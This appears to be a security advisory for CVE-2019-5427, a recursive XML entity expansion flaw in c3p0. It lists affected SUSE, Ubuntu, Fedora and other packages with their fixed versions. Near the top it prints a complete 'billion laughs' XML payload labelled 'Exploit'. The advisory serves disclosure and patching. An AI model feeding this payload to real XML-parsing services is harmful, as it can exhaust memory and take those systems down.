Input validation error in c3p0 - CVE-2019-5427

 

Input validation error in c3p0 - CVE-2019-5427

Published: June 12, 2019


Vulnerability identifier: #VU18785
CSH Severity: Medium
CVSS v4: 8.7 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N]
CVE-ID: CVE-2019-5427
CWE-ID: CWE-20
Exploitation vector: Remote access
Exploit availability: No public exploit available

Vulnerability details

The vulnerability allows a remote attacker to perform a denial of service (DoS) attack.

The vulnerability exists due to insufficient validation of user-supplied input when processing XML files within the c3p0/src/java/com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java. A remote attacker can create a specially crafted XML file, pass it to the affected application and trigger recursive entity expansion when loading configuration. This results in denial of service (DoS) attack aka billion laughs attack.

Exploit:

<?xml version="1.0"?>
<!DOCTYPE lolz [
        <!ENTITY lol "lol">
        <!ELEMENT lolz (#PCDATA)>
        <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
        <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
        <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
        <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
        <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
        <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
        <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
        <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
        <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
        ]>
<lolz>&lol9;</lolz>


Affected software

c3p0
SUSE Manager Server
SUSE Linux Enterprise Module for SUSE Manager Server
Ubuntu
Fedora
Fuse
IBM Qradar SIEM
inter-server-sync
inter-server-sync-debuginfo
saltboot-formula
py26-compat-msgpack-python-debugsource
py26-compat-msgpack-python-debuginfo
py26-compat-msgpack-python
virtualization-formulas
grafana-formula
hub-xmlrpc-api
c3p0 (Ubuntu package)
libc3p0-java (Ubuntu package)
c3p0
subscription-matcher
prometheus-exporters-formula
smdba
supportutils-plugin-susemanager
mgr-push
python3-mgr-push
spacewalk-config
python3-rhnlib
python3-suseRegisterInfo
suseRegisterInfo
python3-mgr-osa-common
python3-mgr-osa-dispatcher
mgr-osa-dispatcher
spacewalk-admin
spacewalk-branding
spacewalk-certs-tools
python3-spacewalk-certs-tools
spacecmd
python3-spacewalk-client-tools
spacewalk-client-tools
spacewalk-backend-config-files-tool
spacewalk-backend-xmlrpc
spacewalk-backend-xml-export-libs
spacewalk-backend-tools
spacewalk-backend-sql-postgresql
spacewalk-backend-config-files
spacewalk-backend
spacewalk-backend-app
spacewalk-backend-applet
spacewalk-backend-sql
spacewalk-backend-config-files-common
spacewalk-backend-iss
spacewalk-backend-iss-export
spacewalk-backend-package-push-server
spacewalk-backend-server
susemanager-schema
uyuni-config-modules
susemanager-sls
spacewalk-base-minimal
spacewalk-base-minimal-config
spacewalk-base
spacewalk-html
susemanager
susemanager-tools
spacewalk-java-postgresql
spacewalk-taskomatic
spacewalk-java-lib
spacewalk-java-config
spacewalk-java
patterns-suma_server
patterns-suma_retail
susemanager-doc-indexes
susemanager-docs_en
susemanager-docs_en-pdf

How to mitigate CVE-2019-5427

Install updates from vendor's website.

c3p0 - update to 0.9.5.4
Fuse - update to 7.6.0
IBM Qradar SIEM - update to 7.5.0 Update Pack 13 IF01
inter-server-sync - update to 0.1.0-150300.8.12.1
inter-server-sync-debuginfo - update to 0.1.0-150300.8.12.1
saltboot-formula - update to 0.1.1645440615.7f1328c-150300.3.9.1
py26-compat-msgpack-python-debugsource - update to 0.4.6-150300.4.3.1
py26-compat-msgpack-python-debuginfo - update to 0.4.6-150300.4.3.1
py26-compat-msgpack-python - update to 0.4.6-150300.4.3.1
virtualization-formulas - update to 0.6.2-150300.8.6.1
grafana-formula - update to 0.7.0-150300.3.6.1
hub-xmlrpc-api - update to 0.7-150300.3.6.1
c3p0 (Ubuntu package) - update to 0.9.1.2-9+deb8u1ubuntu0.14.04.1~esm1
libc3p0-java (Ubuntu package) - addressed in versions 0.9.1.2-9+deb8u1ubuntu0.18.04.1, 0.9.1.2-10ubuntu0.20.04.1, 0.9.1.2-10ubuntu0.21.10.1
c3p0 - addressed in versions 0.9.5.4-1.fc29, 0.9.5.4-1.fc30
c3p0 - update to 0.9.5.5-150300.4.6.1
subscription-matcher - update to 0.29-150300.6.6.1
prometheus-exporters-formula - update to 1.2.0-150300.3.9.1
smdba - update to 1.7.10-0.150300.3.3.1
supportutils-plugin-susemanager - update to 4.2.4-150300.3.6.1
mgr-push - update to 4.2.5-150300.2.9.1
python3-mgr-push - update to 4.2.5-150300.2.9.1
spacewalk-config - update to 4.2.6-150300.3.6.1
python3-rhnlib - update to 4.2.6-150300.4.9.1
python3-suseRegisterInfo - update to 4.2.6-150300.4.9.1
suseRegisterInfo - update to 4.2.6-150300.4.9.1
python3-mgr-osa-common - update to 4.2.8-150300.2.9.1
python3-mgr-osa-dispatcher - update to 4.2.8-150300.2.9.1
mgr-osa-dispatcher - update to 4.2.8-150300.2.9.1
spacewalk-admin - update to 4.2.10-150300.3.9.1
spacewalk-branding - update to 4.2.13-150300.3.9.1
spacewalk-certs-tools - update to 4.2.15-150300.3.15.1
python3-spacewalk-certs-tools - update to 4.2.15-150300.3.15.1
spacecmd - update to 4.2.16-150300.4.18.1
python3-spacewalk-client-tools - update to 4.2.18-150300.4.18.1
spacewalk-client-tools - update to 4.2.18-150300.4.18.1
spacewalk-backend-config-files-tool - update to 4.2.20-150300.4.18.1
spacewalk-backend-xmlrpc - update to 4.2.20-150300.4.18.1
spacewalk-backend-xml-export-libs - update to 4.2.20-150300.4.18.1
spacewalk-backend-tools - update to 4.2.20-150300.4.18.1
spacewalk-backend-sql-postgresql - update to 4.2.20-150300.4.18.1
spacewalk-backend-config-files - update to 4.2.20-150300.4.18.1
spacewalk-backend - update to 4.2.20-150300.4.18.1
spacewalk-backend-app - update to 4.2.20-150300.4.18.1
spacewalk-backend-applet - update to 4.2.20-150300.4.18.1
spacewalk-backend-sql - update to 4.2.20-150300.4.18.1
spacewalk-backend-config-files-common - update to 4.2.20-150300.4.18.1
spacewalk-backend-iss - update to 4.2.20-150300.4.18.1
spacewalk-backend-iss-export - update to 4.2.20-150300.4.18.1
spacewalk-backend-package-push-server - update to 4.2.20-150300.4.18.1
spacewalk-backend-server - update to 4.2.20-150300.4.18.1
susemanager-schema - update to 4.2.21-150300.3.18.1
uyuni-config-modules - update to 4.2.21-150300.3.20.1
susemanager-sls - update to 4.2.21-150300.3.20.1
spacewalk-base-minimal - update to 4.2.26-150300.3.18.2
spacewalk-base-minimal-config - update to 4.2.26-150300.3.18.2
spacewalk-base - update to 4.2.26-150300.3.18.2
spacewalk-html - update to 4.2.26-150300.3.18.2
susemanager - update to 4.2.28-150300.3.22.1
susemanager-tools - update to 4.2.28-150300.3.22.1
spacewalk-java-postgresql - update to 4.2.34-150300.3.26.2
spacewalk-taskomatic - update to 4.2.34-150300.3.26.2
spacewalk-java-lib - update to 4.2.34-150300.3.26.2
spacewalk-java-config - update to 4.2.34-150300.3.26.2
spacewalk-java - update to 4.2.34-150300.3.26.2
patterns-suma_server - update to 4.2-150300.4.9.1
patterns-suma_retail - update to 4.2-150300.4.9.1
susemanager-doc-indexes - update to 4.2-150300.12.22.1
susemanager-docs_en - update to 4.2-150300.12.22.1
susemanager-docs_en-pdf - update to 4.2-150300.12.22.1

External References

Related Security Bulletins